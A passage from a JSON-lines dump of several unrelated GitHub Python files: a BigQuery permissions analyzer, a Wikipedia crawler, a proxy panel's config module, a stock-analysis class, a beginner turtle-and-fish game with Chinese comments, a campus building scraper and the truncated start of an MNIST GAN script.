notes=[AuthzNote.to_generic_note(note)], db_permissions=db_permissions\n )\n )\n\n def _add_role_to_path(self, path: List[AuthzPathElement], member: Member):\n self.logger.debug(\"Adding role %s to path\", member.role)\n path.append(\n AuthzPathElement(\n member.role,\n member.role,\n AuthzPathElementType.ROLE,\n [AuthzNote.to_generic_note(f\"Role {member.role} is granted to {member.name}\")],\n db_permissions=member.db_permissions,\n )\n )\n\n def _report_permission(\n self,\n fq_table_id: Asset,\n node: PolicyNode,\n member: Member,\n permission: PermissionLevel,\n path: List[AuthzPathElement],\n ):\n note = f\"{member.name} has role {member.role}\"\n self._add_to_path(path, node, note, [])\n self._add_role_to_path(path, member)\n reversed_path = list(reversed(path))\n\n identity = Identity(id=f\"{member.original_identity_type}:{member.name}\", type=member.type, name=member.name)\n authz = AuthzEntry(fq_table_id, path=reversed_path, identity=identity, permission=permission)\n self.writer.write_entry(authz)\n path.pop()\n path.pop()\n\n def _resolve_custom_role_to_permissions(self, role: str) -> Optional[CustomPermission]:\n \"\"\"\n Resolve role to the highest permission level it has, or None if it has no permissions to bigquery\n \"\"\"\n row_permissions = self.service.get_permissions_by_role(role)\n db_permissions: List[str] = []\n highest_permission: Optional[PermissionLevel] = None\n for row_permission in row_permissions:\n if row_permission in WRITE_PERMISSIONS:\n highest_permission = PermissionLevel.WRITE\n db_permissions.append(row_permission)\n if row_permission in READ_PERMISSIONS:\n highest_permission = PermissionLevel.READ\n db_permissions.append(row_permission)\n if highest_permission is None:\n return None\n return CustomPermission(db_permissions, highest_permission)\n","repo_name":"SatoriCyber/universal-data-permissions-scanner","sub_path":"universal_data_permissions_scanner/datastores/bigquery/analyzer.py","file_name":"analyzer.py","file_ext":"py","file_size_in_byte":11747,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"53"} +{"seq_id":"19634736343","text":"__author__ = 'root'\nimport requests\nfrom bs4 import BeautifulSoup\nimport time\nimport re\nimport argparse\n\nparser = argparse.ArgumentParser(description='WebCrawler')\nparser.add_argument('--url', dest='url', action='store', default=\"http://en.wikipedia.org/wiki/Hugh_of_Saint-Cher\",help='URL')\nparser.add_argument('--kw', dest='kw', action='store',default=\"\", help='Keyword')\n\n\nargs = parser.parse_args()\n\n\n## global variables\ngv_seed = args.url\ngv_keyword=args.kw\ngv_base_url = \"http://en.wikipedia.org\"\ngv_count = 0\ngv_depth = 1\ngv_dict = {'http://en.wikipedia.org/wiki/Main_Page': 1}\ngv_unique_url_list = []\ngv_final_list=[]\nf=open(\"output.txt\",\"w\")\n\n\nclass CrawlNode(object):\n def __init__(self, url, depth):\n self.depth = depth\n self.url = url\n\n\ndef get_href(url_obj, keyword):\n \"\"\"\n :Function returns all valid anchor on the given url\n :param url_obj: CrawlNode\n :param keyword: String\n :return: List\n \"\"\"\n lv_response = requests.get(url_obj.url)\n time.sleep(1)\n lv_depth = url_obj.depth + 1\n lv_soup = BeautifulSoup(lv_response.content, 'lxml')\n lv_url_list = []\n if (lv_soup.find_all(text=re.compile(keyword,re.IGNORECASE),limit=1)):\n gv_final_list.append(url_obj)\n print (url_obj.url)\n with open(\"output.txt\",\"a+\") as file:\n f.write(url_obj.url+\"\\n\")\n\n\n for link in lv_soup.find_all('a'):\n lv_rel_url=str(link.get('href'))\n if \"#\" in lv_rel_url:\n lv_clean_url=lv_rel_url.split(\"#\",1)[0]\n else:\n lv_clean_url=lv_rel_url\n\n\n if \"/wiki/\" == lv_clean_url[:6] and \":\" not in lv_clean_url:\n lv_final_url = gv_base_url + lv_clean_url\n if lv_final_url in gv_dict.keys():\n continue\n else:\n lv_url_list.append(CrawlNode(lv_final_url, lv_depth))\n gv_dict[lv_final_url] = 1\n else:\n continue\n\n return lv_url_list\n\n\ndef main(url, keyword):\n \"\"\"\n :Function: Maintains a list of unique URLS\n :param url: String\n :param keyword: String\n :return:void\n \"\"\"\n\n\n gv_unique_url_list.append(CrawlNode(url, 1))\n lv_count = 0\n for temp_url in gv_unique_url_list:\n\n if len(gv_final_list) > 999 or temp_url.depth > 5:\n break\n else:\n gv_unique_url_list.extend(get_href(temp_url, keyword))\n lv_count += 1\n\n\n\nif __name__ == \"__main__\":\n main(gv_seed, gv_keyword)\n","repo_name":"patricia5859/PatriciaBagzai","sub_path":"Projects/WebCrawler/webcrawler.py","file_name":"webcrawler.py","file_ext":"py","file_size_in_byte":2516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38195717511","text":"import os\nimport re\nimport random\nimport socket\nimport requests\nfrom datetime import timedelta\nfrom pymongo import MongoClient\n\nprint(\"Initializing...\")\n\n# Force ipv4 for requests\nold_getaddrinfo = socket.getaddrinfo\ndef new_getaddrinfo(*args, **kwargs):\n responses = old_getaddrinfo(*args, **kwargs)\n return [response\n for response in responses\n if response[0] == socket.AF_INET]\nsocket.getaddrinfo = new_getaddrinfo\n\ndef get_libertea_branch():\n return os.environ.get('LIBERTEA_BRANCH_NAME')\n\nLIBERTEA_VERSION = 1034\nLIBERTEA_PROXY_VERSION = 1004\nVERSION_ENDPOINT = \"https://raw.githubusercontent.com/VZiChoushaDui/Libertea/\" + get_libertea_branch() + \"/version.txt\"\n\nHAPROXY_CONTAINER_NAME = 'libertea-haproxy'\n\n# MONGODB_HOST = \"libertea-mongodb:27017\"\nMONGODB_HOST = \"localhost:27017\"\nMONGODB_USER = \"root\"\nMONGODB_DB_NAME = \"panel\"\n\nJWT_VALID_TIME = timedelta(hours=24)\n\nROUTE_IP_LISTS = [\n {\n \"id\": \"cn\",\n \"name\": \"China\",\n },\n {\n \"id\": \"ru\",\n \"name\": \"Russia\",\n },\n {\n \"id\": \"cu\",\n \"name\": \"Cuba\",\n },\n {\n \"id\": \"th\",\n \"name\": \"Thailand\",\n },\n {\n \"id\": \"tm\",\n \"name\": \"Turkmenistan\",\n },\n {\n \"id\": \"ir\",\n \"name\": \"Iran\",\n },\n {\n \"id\": \"sy\",\n \"name\": \"Syria\",\n },\n {\n \"id\": \"sa\",\n \"name\": \"Saudi Arabia\",\n },\n {\n \"id\": \"tr\",\n \"name\": \"Turkey\",\n }\n]\nROUTE_IP_LISTS = sorted(ROUTE_IP_LISTS, key=lambda k: k['name'])\n\ndef get_ip_api_url():\n return random.choice([\n 'https://api.ipify.org',\n 'https://ifconfig.io/ip',\n 'https://icanhazip.com',\n 'https://ident.me',\n 'https://ipecho.net/plain',\n 'https://myexternalip.com/raw',\n 'https://wtfismyip.com/text',\n 'https://checkip.amazonaws.com',\n ])\n\nSERVER_MAIN_IP = None\nfor i in range(5):\n try:\n ip = requests.get(get_ip_api_url(), timeout=3).content.decode('utf8').strip()\n if not re.match(r'^\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}$', ip):\n print(\"Failed to get server ip. Result was: \" + str(ip))\n continue\n\n SERVER_MAIN_IP = ip\n break\n except Exception as e:\n print(\"Failed to get server ip: \" + str(e))\n\nif SERVER_MAIN_IP is None:\n raise Exception(\"couldn't fetch SERVER_MAIN_IP\")\n\nif not re.match(r'^\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}$', SERVER_MAIN_IP):\n raise Exception(\"couldn't fetch SERVER_MAIN_IP. Result was: \" + str(SERVER_MAIN_IP))\n\n# print(\"SERVER_MAIN_IP: \" + SERVER_MAIN_IP)\n\ndef get_mongodb_password():\n return os.environ.get('PANEL_MONGODB_PASSWORD')\n\ndef get_panel_secret_key():\n return os.environ.get('PANEL_SECRET_KEY')\n\ndef get_admin_uuid():\n return os.environ.get('PANEL_ADMIN_UUID')\n\ndef get_proxy_connect_uuid():\n return os.environ.get('PANEL_PROXY_CONNECT_UUID')\n\ndef get_panel_domain():\n return os.environ.get('PANEL_DOMAIN')\n\ndef get_mongodb_connection_string():\n connstr = \"mongodb://\" + MONGODB_USER + \":\" + get_mongodb_password() + \"@\" + MONGODB_HOST\n # print(\"connstr:\", connstr)\n return connstr\n\n___mongoClient = None\n___mongoClientPid = None\n\ndef get_mongo_client():\n global ___mongoClient\n global ___mongoClientPid\n\n my_pid = os.getpid()\n if ___mongoClient is None or ___mongoClientPid != my_pid:\n print(f\" -- creating mongo client on pid {my_pid}\")\n ___mongoClient = MongoClient(get_mongodb_connection_string(), serverSelectionTimeoutMS=5000)\n ___mongoClientPid = my_pid\n\n try:\n ___mongoClient.server_info()\n except Exception as e:\n print(f\" -- reconnecting mongo client on pid {my_pid}\")\n ___mongoClient = MongoClient(get_mongodb_connection_string(), serverSelectionTimeoutMS=5000)\n ___mongoClientPid = my_pid\n\n return ___mongoClient\n\ndef get_hostcontroller_api_key():\n return os.environ.get('HOSTCONTROLLER_API_KEY')\n\ndef get_bootstrap_script_url():\n return \"https://raw.githubusercontent.com/VZiChoushaDui/Libertea/\" + get_libertea_branch() + \"/bootstrap.sh\"\n\ndef get_root_dir():\n env_root_dir = os.environ.get('LIBERTEA_ROOT_DIR')\n if env_root_dir is not None and env_root_dir != \"\":\n path = env_root_dir\n if path[-1] != '/':\n path += '/'\n return path\n return \"/root/libertea/\"\n","repo_name":"VZiChoushaDui/Libertea","sub_path":"panel/panel/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":4349,"program_lang":"python","lang":"en","doc_type":"code","stars":197,"dataset":"github-code","pt":"53"} +{"seq_id":"8777506292","text":"import numpy as np\nimport alpaca_trade_api as tradeapi\nfrom datetime import datetime, timedelta\nimport yahoo_fin.stock_info as yf\nfrom dotenv import load_dotenv\nimport json\nimport os\nimport ta\n\nclass Stockalyzer:\n def __init__(self, symbol, interval='day', mode='store', financials=True):\n '''\n Class to analyze stocks using 3 tecnical indicators: Relative Strength Index (RSI)\n Stochastic Oscillator, and Moving Average Convergence Divergence (MACD) and simple moving\n average analysis. Also performs basic finance analysis of the company and assigns score\n Params: ticker - 4 letter stock name eg. 'MSFT'\n interval='daily'\n '''\n load_dotenv()\n \n dir_path = os.path.dirname(os.path.realpath(__file__))\n config = dir_path + \"/config.json\"\n with open(config, \"r\") as f:\n self.params = json.load(f)\n\n self.stock = symbol\n \n # Be sure to change keys in .env file if changing from paper/live\n self.api = tradeapi.REST(os.getenv('APCA_API_KEY_ID'), os.getenv('APCA_API_SECRET_KEY'), os.getenv('APCA_ENDPOINT'))\n self.account = self.api.get_account()\n \n if interval == 'day':\n self.interval = tradeapi.TimeFrame.Day\n elif interval == 'hour':\n self.interval = tradeapi.TimeFrame.Hour\n else:\n raise ValueError(\"Interval must be 'hour' or 'day'\")\n\n start = datetime.today().strftime('%Y-%m-%d')\n end = (datetime.today() - timedelta(200)).strftime('%Y-%m-%d')\n self.price_data = self.getPriceData(end, start)\n \n if self.price_data.empty:\n raise AttributeError('No Price Data found for {}'.format(self.stock))\n \n self.price = self.getPrice()\n self.adr = self.getADR()\n self.avg_50 = self.price_data['close'].tail(50).mean()\n self.avg_200 = self.price_data['close'].tail(200).mean()\n\n self.rsi = ta.momentum.RSIIndicator(self.price_data['close'], 7).rsi()\n \n stochastic = ta.momentum.StochasticOscillator(self.price_data['high'], self.price_data['low'], self.price_data['close'])\n self.stoch = stochastic.stoch()\n self.stoch_sig = stochastic.stoch_signal()\n \n macd = ta.trend.MACD(self.price_data['close'])\n self.macd = macd.macd()\n self.macd_sig = macd.macd_signal()\n \n self.financials = financials\n\n if self.financials:\n self.balance_sheet = yf.get_balance_sheet(self.stock)\n self.income_statement = yf.get_income_statement(self.stock)\n self.cfs = yf.get_cash_flow(self.stock)\n self.years = self.balance_sheet.columns\n \n self.score = self.get_score()\n self.analysis = self.get_analysis()\n\n def getPriceData(self, start, end):\n df = self.api.get_bars(self.stock, self.interval, start, end, adjustment='raw').df\n return df\n \n def getPrice(self):\n return self.price_data['close'].iloc[-1]\n\n def getADR(self):\n # Average Daily Range\n data = self.price_data.tail(self.params['technical_params']['ADR']['period'])\n \n ranges = data['high'] - data['low']\n \n return ranges.mean()\n\n def getStopPrice(self):\n return self.price - self.adr\n\n def getSellPrice(self):\n return self.price + self.adr * 2\n\n def profitability(self):\n \"\"\"\n Determine profitability of a company using income statement, balance sheet, and cash flow\n :return: p_score - total profitability score from 0 to 4\n \"\"\"\n\n if not self.financials:\n raise Exception(\"Financials must be enabled. Set financials argument to true when initializing Stockalyzer\")\n\n p_score = 0\n\n # Net Income\n net_income = self.income_statement[self.years[0]]['netIncome']\n net_income_last = self.income_statement[self.years[1]]['netIncome']\n ni_ratio_score = 1 if net_income > net_income_last and net_income > 0 else 0\n p_score += ni_ratio_score\n\n # Operating Cash Flow\n op_cf = self.cfs[self.years[0]]['totalCashFromOperatingActivities']\n of_cf_score = 1 if op_cf > 0 else 0\n p_score += of_cf_score\n\n # Return on Assets\n avg_assets = (self.balance_sheet[self.years[0]]['totalAssets'] + self.balance_sheet[self.years[1]]['totalAssets']) / 2\n avg_assets_last = (self.balance_sheet[self.years[1]]['totalAssets'] + self.balance_sheet[self.years[2]]['totalAssets']) / 2\n RoA = net_income / avg_assets\n RoA_last = net_income_last / avg_assets_last\n RoA_score = 1 if RoA > RoA_last else 0\n p_score += RoA_score\n\n # Accruals\n total_assets = self.balance_sheet[self.years[0]]['totalAssets']\n accruals = op_cf / total_assets - RoA\n acc_score = 1 if accruals > 0 else 0\n p_score += acc_score\n\n return p_score\n\n def leverage(self):\n \"\"\"\n Determine leverage of a company with balance sheet\n :return: l_score - total leverage score from 0 to 2\n \"\"\"\n \n if not self.financials:\n raise Exception(\"Financials must be enabled. Set financials argument to true when initializing Stockalyzer\")\n\n l_score = 0\n\n # Long-term debt ratio\n try:\n ltd = self.balance_sheet[self.years[0]]['longTermDebt']\n total_assets = self.balance_sheet[self.years[0]]['totalAssets']\n debt_ratio = ltd / total_assets\n dr_score = 1 if debt_ratio < 0.4 else 0\n l_score += dr_score\n except:\n l_score += 1\n\n # Current ratio\n current_assets = self.balance_sheet[self.years[0]]['totalCurrentAssets']\n current_liab = self.balance_sheet[self.years[0]]['totalCurrentLiabilities']\n current_ratio = current_assets / current_liab\n cr_score = 1 if current_ratio > 1 else 0\n l_score += cr_score\n\n return l_score\n\n def operating_efficiency(self):\n \"\"\"\n Determine operating efficency of a company\n :return: oe_score - score representing operating efficency from 0 to 2\n \"\"\"\n \n if not self.financials:\n raise Exception(\"Financials must be enabled. Set financials argument to true when initializing Stockalyzer\")\n\n oe_score = 0\n\n # Gross margin\n gp = self.income_statement[self.years[0]]['grossProfit']\n gp_last = self.income_statement[self.years[1]]['grossProfit']\n revenue = self.income_statement[self.years[0]]['totalRevenue']\n revenue_last = self.income_statement[self.years[1]]['totalRevenue']\n gm = gp / revenue\n gm_last = gp_last / revenue_last\n gm_score = 1 if gm > gm_last else 0\n oe_score += gm_score\n\n # Asset turnover\n avg_assets = (self.balance_sheet[self.years[0]]['totalAssets'] + self.balance_sheet[self.years[1]]['totalAssets']) / 2\n avg_assets_last = (self.balance_sheet[self.years[1]]['totalAssets'] + self.balance_sheet[self.years[2]]['totalAssets']) / 2\n at = revenue / avg_assets\n at_last = revenue_last / avg_assets_last\n at_score = 1 if at > at_last else 0\n oe_score += at_score\n\n return oe_score\n\n def get_score(self):\n \"\"\"\n Returns total score based on profitability, leverage, and operating efficiency\n :return: s - total score from 0 (worst) to 8 (best)\n \"\"\"\n \n if not self.financials:\n raise Exception(\"Financials must be enabled. Set financials argument to true when initializing Stockalyzer\")\n\n s = self.profitability() + self.leverage() + self.operating_efficiency()\n return s\n\n def get_analysis(self, timestamp='now'):\n '''\n Returns an analysis of given stock in terms of a buy,\n sell, or hold position. Estimated 9% gain\n Return: string 'Buy', 'Sell', or 'Hold'\n '''\n rsi = self.rsi.iloc[-1] > 50\n stoch = self.stoch.iloc[-1] > self.stoch_sig.iloc[-1]\n macd = self.macd.iloc[-1] > self.macd_sig.iloc[-1]\n up = self.price > self.avg_50 and self.avg_50 > self.avg_200\n\n if (rsi and\n stoch and\n macd and\n up):\n return 'Buy'\n elif (not rsi and\n not stoch and\n not macd and\n not up):\n return 'Sell'\n else:\n return 'Hold'\n","repo_name":"nialldevlin/Stock-tracker","sub_path":"src/stock_analyzer.py","file_name":"stock_analyzer.py","file_ext":"py","file_size_in_byte":8488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4531658778","text":"# 0.按照要求定义一个游乐园门票的类,并尝试计算2个成人+1个小孩平日票价\n# -- 平时票价100元\n# -- 周末票价为平时的120%\n# -- 儿童半票\n# 面向对象编程的难点在于思维的转换\nclass Ticket():\n # weekend 平时或周末 child 是否为儿童\n def __init__(self, weekend = False, child = False):\n self.exp = 100\n if weekend:\n self.inc = 1.2\n else:\n self.inc = 1\n if child:\n self.discount = 0.5\n else:\n self.discount = 1\n def calcPrice(self, num):\n return self.exp * self.inc * self.discount * num\nadult = Ticket()\nchild = Ticket(child = True)\nprint(\"2个成人 + 1个小孩平日票价为:%.2f\" % (adult.calcPrice(2) + child.calcPrice(1)))\n\n\n# 0.1 进阶,可以让用户手动输入是否为周末,有几个成人和儿童,求票价\n'''有问题,无法解决在外部改变__init__的形参默认值'''\n#class Ticket():\n# def __init__(self, weekend = False, child = False):\n# self.exp = 100\n# if weekend:\n# self.inc = 1.2\n# else:\n# self.inc = 1\n# if child:\n# self.discount = 0.5\n# else:\n# self.discount = 1\n# def calcPrice(self, adult_num, child_num):\n# return self.inc * self.exp * adult_num + self.inc * self.exp * self.discount * child_num\n\n\n#weekend = input(\"是否为周末(是或否)?\\n\")\n#adult_num = int(input(\"请输入成人人数:\"))\n#child_num = int(input(\"请输入儿童人数:\"))\n\n#if weekend == 'j':\n# weekend = '周末'\n# Ticket(weekend = True)\n#else:\n# weekend = '平日'\n\n#if child_num > 0:\n# Ticket(child = True)\n\n##t = Ticket()\n\n#print(\"%d个成人和%d个小孩的%s票价为%.2f\" % (adult_num, child_num, weekend, Ticket().calcPrice(adult_num, child_num)))\n\n\n\n\n# 1.游戏编程:按以下要求定义一个乌龟类和鱼类并尝试编写游戏\n'''\n假设游戏场景为范围(x,y)为0 <= x <= 10, 0 <= y <= 10\n游戏生成1只乌龟和10条鱼\n它们的移动方向均随机\n乌龟的最大移动能力是2(可以随机选择1还是2移动),鱼儿最大移动能力是1\n当移动到场景边缘,自动向反方向移动 \n乌龟初始化体力为100(上限)\n乌龟每移动一次,体力消耗1\n当乌龟和鱼的坐标重叠,乌龟吃掉鱼,乌龟体力增加20\n鱼暂不计算体力\n当乌龟体力值为0(挂掉)或鱼儿的数量为0时游戏结束'''\nimport random as r\n\nlegal_x = [0, 10]\nlegal_y = [0, 10]\n\nclass Turtle:\n def __init__(self):\n # 初始体力\n self.power = 100\n # 初始位置随机\n self.x = r.randint(legal_x[0], legal_x[1])\n self.y = r.randint(legal_y[0], legal_y[1])\n\n def move(self):\n # 随机计算方向并移动到新的位置(x, y)\n new_x = self.x + r.choice([1, 2, -1, -2])\n new_y = self.y + r.choice([1, 2, -1, -2])\n # 检查移动后是否超出场景x轴边界\n if new_x < legal_x[0]:\n self.x = legal_x[0] - (new_x - legal_x[0])\n elif new_x > legal_x[1]:\n self.x = legal_x[1] - (new_x - legal_x[1])\n else:\n self.x = new_x\n # 检查移动后是否超出场景y轴边界\n if new_y < legal_y[0]:\n self.y = legal_y[0] - (new_y - legal_y[0])\n elif new_y > legal_y[1]:\n self.y = legal_y[1] - (new_y - legal_y[1])\n else:\n self.y = new_y \n # 体力消耗\n self.power -= 1\n # 返回移动后的新位置\n return (self.x, self.y)\n\n def eat(self):\n self.power += 20\n if self.power > 100:\n self.power = 100\n\nclass Fish:\n def __init__(self):\n self.x = r.randint(legal_x[0], legal_x[1])\n self.y = r.randint(legal_y[0], legal_y[1])\n \n def move(self):\n # 随机计算方向并移动到新的位置(x, y)\n new_x = self.x + r.choice([1, -1])\n new_y = self.y + r.choice([1, -1])\n # 检查移动后是否超出场景x轴边界\n if new_x < legal_x[0]:\n self.x = legal_x[0] - (new_x - legal_x[0])\n elif new_x > legal_x[1]:\n self.x = legal_x[1] - (new_x - legal_x[1])\n else:\n self.x = new_x\n # 检查移动后是否超出场景y轴边界\n if new_y < legal_y[0]:\n self.y = legal_y[0] - (new_y - legal_y[0])\n elif new_y > legal_y[1]:\n self.y = legal_y[1] - (new_y - legal_y[1])\n else:\n self.y = new_y\n # 返回移动后的新位置\n return (self.x, self.y)\n\nturtle = Turtle()\nfish = []\nfor i in range(10):\n new_fish = Fish()\n fish.append(new_fish)\n\nwhile True:\n if not len(fish):\n print(\"鱼儿都吃完了,游戏结束!\")\n break\n if not turtle.power:\n print(\"乌龟体力耗尽,挂掉了!\")\n break\n\n pos = turtle.move()\n # 在迭代器中删除列表元素是非常危险的,经常会出现意想不到的问题,因为迭代器是直接引用列表的数据进行引用\n # 这里我们把列表拷贝给迭代器,然后对原列表进行删除操作就不会有问题了^_^\n for each_fish in fish[:]:\n if each_fish.move() == pos:\n # 鱼儿被吃掉了\n turtle.eat()\n fish.remove(each_fish)\n print(\"有一条鱼儿被吃掉了...\")\n","repo_name":"pangfeiyo/PythonLearn","sub_path":"甲鱼python/课程代码/第37讲/动动手.py","file_name":"动动手.py","file_ext":"py","file_size_in_byte":5419,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30551461121","text":"#!/usr/bin/env python\n# coding=utf-8\n\nimport calendar\nimport re\n\nfrom bs4 import BeautifulSoup\nfrom urllib import urlopen\nfrom urlparse import urljoin\nfrom pprint import pprint\nfrom string import digits\n\nfrom itsm.adsm import ADSMBase\n\n\nclass BuildingDetailsToADSM(ADSMBase):\n\n\t# Production\n\tuc_list = '{8E3E8107-9FEF-406F-880E-8C980E7400EE}'\n\tkey_fields = ('ID', 'Title')\n\n\tdef argument_parser(self):\n\t\tparser = super(BuildingDetailsToADSM, self).argument_parser()\n\n\t\tparser.add_argument('buildings_url', default='http://www.ucalgary.ca/facilities/buildings/', nargs='?')\n\n\t\treturn parser\n\n\tdef main(self):\n\t\tmonths_map = dict((calendar.month_name[i][:3], '%02d' % i) for i in range(1, 13))\n\t\tmonths_map.update(dict((calendar.month_name[i], '%02d' % i) for i in range(1, 13)))\n\n\t\tdef conv_date(d):\n\t\t\tif d in ('TBC', '...', '--'):\n\t\t\t\treturn None\n\t\t\tparts = d.split(' ')\n\t\t\tif len(parts) == 1: # Year\n\t\t\t\treturn '%s-01-01 00:00:00' % parts[0]\n\t\t\telif len(parts) == 2: # Month Year\n\t\t\t\treturn '%s-%s-01 00:00:00' % (parts[1], months_map.get(parts[0], '01'), )\n\t\t\treturn None\n\n\t\tfield_map = (\n\t\t\t('CIDescription', lambda r: r['Facts'][0] if len(r['Facts']) > 0 else None),\n\t\t\t('CIBusinessOwner', lambda r: self.person_ref(r['Facility Manager'][1])),\n\t\t\t('CIBuildingEmergencyP1', lambda r: filter(lambda x: '(primary)' in x, r['Emergency Assembly Points'])[0] if isinstance(r['Emergency Assembly Points'], list) else r['Emergency Assembly Points']),\n\t\t\t('CIBuildingEmergencyP2', lambda r: filter(lambda x: '(secondary)' in x, r['Emergency Assembly Points'])[0]),\n\t\t\t('CIBuildingArchitect', 'Architect'),\n\t\t\t('CISupplier', 'General Contractor'),\n\t\t\t('CIBuildingZone', 'Zone'),\n\t\t\t('CIBuildingArea', lambda r: r['Building Area'] or r['Original Building Area']),\n\t\t\t('CIDevelopmentDate', lambda r: conv_date(r['Start Date'])),\n\t\t\t('CIReleaseDate', lambda r: conv_date(r['Completion Date'])),\n\t\t\t('CIProductionFundingAmount', 'Cost'),\n\t\t\t('CIInformation', lambda r: '%s, %s' % (r['URL'], r['Building'])),\n\t\t)\n\n\t\tdef rows():\n\t\t\tname_map = {\n\t\t\t\t'General Services': 'General Services Building',\n\t\t\t\t'Grounds': 'Grounds Building',\n\t\t\t\t'Kinesiology Complex': 'Kinesiology A',\n\t\t\t\t'MacKimmie Library Block and Tower': 'MacKimmie Tower',\n\t\t\t\t'Materials Handling': 'Materials Handling Facility',\n\t\t\t\t'Math Sciences Building and Tower': 'Mathematical Sciences',\n\t\t\t\t'Education Block and Tower': 'Education Tower',\n\t\t\t\t'Weather Research Station': 'Weather Station',\n\t\t\t\t'Heritage Medical': 'Heritage Medical Research Building',\n\t\t\t\t'Priddis Observatory': 'Rothney Astrological Observatory Lab',\n\t\t\t\t'International House / Hotel Alma': 'International House (Dr. Fok Ying Tong)',\n\t\t\t\t'Yamnuska': 'Yamnuska Hall'\n\t\t\t}\n\n\t\t\tfor building in self.buildings():\n\t\t\t\tbuilding['AdjustedBuilding'] = name_map.get(building['Building'], building['Building'])\n\t\t\t\tyield building\n\n\t\tdef compare_f(ext_item, list_item):\n\t\t\treturn 'Update' if list_item else None\n\n\t\tself.sync_to_list_by_comparison(BuildingDetailsToADSM.uc_list, None, BuildingDetailsToADSM.key_fields, '_ows_Title', rows(), 'AdjustedBuilding', compare_f, field_map, content_type='Building', fuzzy=True, commit=not self.args.d)\n\n\tdef buildings(self):\n\t\t# Fetch the list of all buildings\n\t\tbuildings_soup = BeautifulSoup(urlopen(self.args.buildings_url))\n\t\tbuilding_anchors = buildings_soup.find_all('a', href=re.compile('/facilities/buildings/'))\n\n\t\t# For each building, fetch its information\n\t\tfor building_anchor in building_anchors:\n\t\t\tbuilding_url = urljoin(self.args.buildings_url, building_anchor['href'])\n\t\t\tbuilding_soup = BeautifulSoup(urlopen(building_url))\n\n\t\t\tinfo_heading = building_soup.find('h2', text='INFORMATION') or building_soup.find_all('h2')[5]\n\t\t\tinfo_detail_candidates = []\n\t\t\tfor sibling in info_heading.next_siblings:\n\t\t\t\tif sibling.name == 'p':\n\t\t\t\t\tinfo_detail_candidates.append(sibling)\n\t\t\t\telif sibling.name == 'h2':\n\t\t\t\t\tbreak\n\t\t\tinfo_details = max(info_detail_candidates, key=lambda x: len(x))\n\n\t\t\tinfo = {}\n\t\t\tkey, values = None, []\n\t\t\tdef commit_info(key, values):\n\t\t\t\tif key != None:\n\t\t\t\t\tvalue = values if len(values) > 1 else values[0] if len(values) == 1 else None\n\t\t\t\t\tinfo[key] = value\n\t\t\tfor child in info_details.children:\n\t\t\t\tif child.name == 'strong':\n\t\t\t\t\tcommit_info(key, values)\n\t\t\t\t\tkey = child.text.strip(u': \\xa0')\n\t\t\t\t\tvalues = []\n\t\t\t\telif child.name == None:\n\t\t\t\t\tvalue = child.strip(u' []\\xa0')\n\t\t\t\t\tif key == u'Start/Completion Date' or key == u'Date':\n\t\t\t\t\t\tdates = value.split('/')\n\t\t\t\t\t\tcommit_info(u'Start Date', (dates[0].strip(),))\n\t\t\t\t\t\tcommit_info(u'Completion Date', (dates[1].strip(),) if len(dates) > 1 else [])\n\t\t\t\t\t\tkey = None\n\t\t\t\t\telif value:\n\t\t\t\t\t\tif key in ('Building Area', 'Zone'):\n\t\t\t\t\t\t\tvalue = ''.join(c for c in value if c in digits)\n\t\t\t\t\t\t\tvalue = int(value) if value else 0\n\t\t\t\t\t\telif key in ('Cost'):\n\t\t\t\t\t\t\tmillion = 'million' in value\n\t\t\t\t\t\t\tvalue = ''.join(c for c in value if c in digits + '.')\n\t\t\t\t\t\t\tvalue = float(value) if value else 0.0\n\t\t\t\t\t\t\tif million:\n\t\t\t\t\t\t\t\tvalue *= 1000000.0\n\t\t\t\t\t\tvalues.append(value)\n\t\t\t\telif key == u'Facility Manager' and child.name == 'a':\n\t\t\t\t\tvalue = child['href']\n\t\t\t\t\tif value.startswith('mailto:'):\n\t\t\t\t\t\tvalue = (values[-1], value[7:])\n\t\t\t\t\t\tvalues[-1] = value\n\t\t\tcommit_info(key, values)\n\n\t\t\tfacts_heading = building_soup.find('h2', text='INTERESTING FACTS')\n\t\t\tfacts_details = facts_heading.find_next_sibling('ul')\n\t\t\tfacts = [fact.text.strip() for fact in facts_details.find_all('li')]\n\n\t\t\tcommit_info('Facts', facts)\n\n\t\t\tinfo['Building'] = building_anchor.text\n\t\t\tinfo['URL'] = building_url\n\t\t\tyield info\n\n\ndef main(args=None):\n\treturn BuildingDetailsToADSM(args=args).run()\n\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"kinghuang/itsm","sub_path":"itsm/building-details-to-adsm.py","file_name":"building-details-to-adsm.py","file_ext":"py","file_size_in_byte":5671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7206471036","text":" ## Imports\nimport keras\nfrom keras import backend as K\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\nfrom keras.datasets import mnist\n\nfrom keras.models import Sequential, Model\nfrom keras.layers import Dense, Conv2DTranspose, Conv2D\nfrom keras.layers.core import Dropout\nfrom keras.layers import BatchNormalization\nfrom keras.layers import Activation, Input\nfrom keras.layers import LeakyReLU\nfrom sklearn.preprocessing import OneHotEncoder\nfrom keras.optimizers import Adagrad, Adam\nimport matplotlib.pyplot as plt\n\nsess = tf.Session(config=tf.ConfigProto(log_device_placement=True))\nK.tensorflow_backend._get_available_gpus()\n\ndef load_data():\n (X_train, y_train), (X_test, y_test) = mnist.load_data()\n X_train = (X_train.astype(np.float32)) / 255 # Set to 0-1 for each pixel value\n X_train = X_train.reshape(-1, 784)\n X_test = X_test.reshape(-1, 784)\n return X_train, y_train, X_test, y_test\n\ndef plot_loss(epoch, dLosses, gLosses):\n plt.figure(figsize=(10, 8))\n plt.plot(dLosses, label='Discriminative Loss')\n plt.plot(gLosses, label='Generative Loss')\n plt.xlabel('Epoch')\n plt.ylabel('Loss')\n plt.legend()\n plt.savefig('images/mnist_gan/gan_loss_epoch_%d.png' % epoch)\n \ndef plot_images(epoch, generator, examples=100):\n dim=(10, 10)\n noise = np.random.normal(0, 1, size=[examples, 100])\n 